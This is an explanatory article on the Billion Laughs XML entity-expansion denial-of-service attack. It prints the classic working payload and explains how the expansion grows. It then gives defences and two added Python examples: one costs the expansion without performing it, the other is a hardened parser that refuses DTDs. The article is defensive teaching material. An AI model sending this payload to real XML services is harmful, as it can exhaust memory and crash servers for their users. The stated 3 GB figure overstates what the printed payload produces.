Billion Laughs Attack

Billion Laughs Attack (also called XML Bomb or Exponential Entity Expansion) is a denial-of-service attack against XML parsers that uses nested entity definitions to exponentially expand a small XML document into gigabytes of data, exhausting server memory.

How It Works

The attack defines entities that reference other entities in a nested pattern. When the parser expands the final entity, each level multiplies the expansion, creating exponential growth from a small payload.

Classic Billion Laughs Payload

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

Expansion Math

  • lol = 3 bytes
  • lol2 = 10 × lol = 30 bytes
  • Each level: 10× previous
  • lol9 = 10^9 × 3 bytes = ~3 GB
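
The figures above can be checked without ever expanding anything: the expanded size of each entity is the sum of the sizes of the entities it references, so the whole entity graph can be costed arithmetically. The Python below is an added example, not part of the original article; every function name in it is mine. It takes the payload exactly as printed above, whose chain starts at lol2 and therefore has eight tenfold steps from lol: it comes out at 3 × 10^8 bytes (300 MB), while the classic variant with an additional lol1 level is what reaches the 10^9 figure in the list. The same estimator doubles as a pre-parse budget check, which is the "limit entity expansion" defence done before the parser touches the body.

```python
import re

# Constructed copy of the classic payload printed above (chain starts at lol2).
BILLION_LAUGHS = """<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>"""

# The regexes cover the internal-subset, double-quoted general entities the payload
# uses; this is an estimator for a budget check, not a full DTD parser. Character
# references (&#...;) are not matched and are counted at their literal length.
DOCTYPE = re.compile(r"<!DOCTYPE[^\[>]*(?:\[(.*?)\])?\s*>", re.S)
ENTITY_DECL = re.compile(r'<!ENTITY\s+([A-Za-z_][\w.-]*)\s+"([^"]*)"\s*>')
ENTITY_REF = re.compile(r"&([A-Za-z_][\w.-]*);")
PREDEFINED = {"lt", "gt", "amp", "quot", "apos"}  # each expands to one character


def split_dtd(doc: str):
    """Return (internal DTD subset, document body after the DOCTYPE)."""
    m = DOCTYPE.search(doc)
    if not m:
        return "", doc
    return m.group(1) or "", doc[m.end():]


def expanded_size(text: str, entities: dict, memo: dict, stack=()) -> int:
    """Bytes `text` would occupy with every entity reference fully expanded.

    Purely arithmetic: replacement texts are measured, never concatenated, so a
    300 MB (or 3 GB) expansion is costed in a few hundred operations.
    """
    size, last = 0, 0
    for ref in ENTITY_REF.finditer(text):
        size += len(text[last:ref.start()].encode())
        last = ref.end()
        name = ref.group(1)
        if name in PREDEFINED and name not in entities:
            size += 1
            continue
        if name not in entities:
            raise ValueError(f"undeclared entity &{name};")
        if name in stack:  # XML forbids recursive entities; a parser would reject this
            raise ValueError(f"recursive entity &{name};")
        if name not in memo:
            memo[name] = expanded_size(entities[name], entities, memo, stack + (name,))
        size += memo[name]
    return size + len(text[last:].encode())


def entity_sizes(doc: str) -> dict:
    """Expanded size of every declared entity (reproduces the 'Expansion Math' list)."""
    subset, _ = split_dtd(doc)
    entities = dict(ENTITY_DECL.findall(subset))
    memo = {}
    for name in entities:
        if name not in memo:
            memo[name] = expanded_size(entities[name], entities, memo, (name,))
    return memo


def estimate_expansion(doc: str) -> int:
    """Expanded size in bytes of the document body, computed without expanding it."""
    subset, body = split_dtd(doc)
    entities = dict(ENTITY_DECL.findall(subset))
    return expanded_size(body, entities, {})


def within_budget(doc: str, max_expanded_bytes: int = 10 * 1024 * 1024) -> bool:
    """Pre-parse check against an assumed 10 MiB expansion budget."""
    try:
        return estimate_expansion(doc) <= max_expanded_bytes
    except ValueError:
        return False  # undeclared or recursive entities: a parser would reject these too


if __name__ == "__main__":
    for name, size in entity_sizes(BILLION_LAUGHS).items():
        print(f"{name:5s} -> {size:>12,} bytes")
    print(f"body expands to {estimate_expansion(BILLION_LAUGHS):,} bytes;",
          "within budget:", within_budget(BILLION_LAUGHS))
```

Because the estimator memoises per entity, its cost is proportional to the number of declarations and references in the DTD, not to the expanded size, which is exactly the property a pre-parse check needs.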

Impact

  • Memory exhaustion → server crash
  • CPU exhaustion during parsing
  • Denial of service

Prevention

  • Disable DTD processing
  • Limit entity expansion depth and count
  • Set maximum document size limits
  • Use streaming parsers with limits
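
The four measures above can all be applied with nothing but the standard library. The following Python is an added example, not code from the original article; the function names and the 1 MiB size budget are my own choices. It uses the `xml.parsers.expat` bindings directly: expat invokes the DOCTYPE and entity-declaration callbacks the moment it reads those declarations, before the document body is parsed, so raising from them refuses a Billion Laughs DTD before a single entity is expanded. Parameter-entity parsing is switched off, external entity references are refused, and the streaming callbacks count elements without building a tree.

```python
import xml.parsers.expat as expat

MAX_DOCUMENT_BYTES = 1024 * 1024  # assumed budget: 1 MiB per untrusted document


class UnsafeXML(ValueError):
    """Raised when an untrusted document uses a feature this parser refuses."""


def count_elements(data: bytes, max_bytes: int = MAX_DOCUMENT_BYTES) -> int:
    """Parse untrusted XML with the stdlib expat bindings and return the element count.

    Defences, in the order the prevention list gives them: DTD and entity
    declarations refused before anything is expanded, no external or parameter
    entities, a hard size cap, and streaming (SAX-style) callbacks so no tree is built.
    """
    if len(data) > max_bytes:
        raise UnsafeXML(f"document is {len(data)} bytes; limit is {max_bytes}")

    parser = expat.ParserCreate()
    # Never load or expand parameter entities (external DTD subsets).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    # Expat calls these as soon as it reads the declaration, i.e. before the body
    # is parsed, so a Billion Laughs DTD is rejected before any expansion happens.
    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DTD not allowed (<!DOCTYPE {name}>)")

    def reject_entity_decl(name, *_):
        raise UnsafeXML(f"entity declaration not allowed ({name})")

    def reject_external_ref(context, base, sysid, pubid):
        raise UnsafeXML(f"external entity not allowed ({sysid})")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity_decl
    parser.ExternalEntityRefHandler = reject_external_ref

    elements = 0

    def on_start(name, attrs):
        nonlocal elements
        elements += 1

    parser.StartElementHandler = on_start
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        raise UnsafeXML(f"malformed XML: {exc}") from exc
    return elements


def classify(data: bytes, max_bytes: int = MAX_DOCUMENT_BYTES):
    """Return (accepted, detail) so callers can log rejections without try/except."""
    try:
        return True, f"{count_elements(data, max_bytes)} elements"
    except UnsafeXML as exc:
        return False, str(exc)


if __name__ == "__main__":
    # Constructed samples: a benign document and a tiny DTD-bearing one. Any DTD is
    # refused, so the payload from this article never reaches the expansion stage.
    benign = b"<orders><order id='1'/><order id='2'/></orders>"
    with_dtd = b'<!DOCTYPE x [<!ENTITY a "aaaa">]><x>&a;</x>'
    for sample in (benign, with_dtd):
        print(classify(sample))
```

Refusing the DOCTYPE outright is the simplest and most robust form of "disable DTD processing"; if an application genuinely needs internal DTDs, the entity-declaration hook is the place to count declarations and measure replacement text against a budget instead of raising unconditionally.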
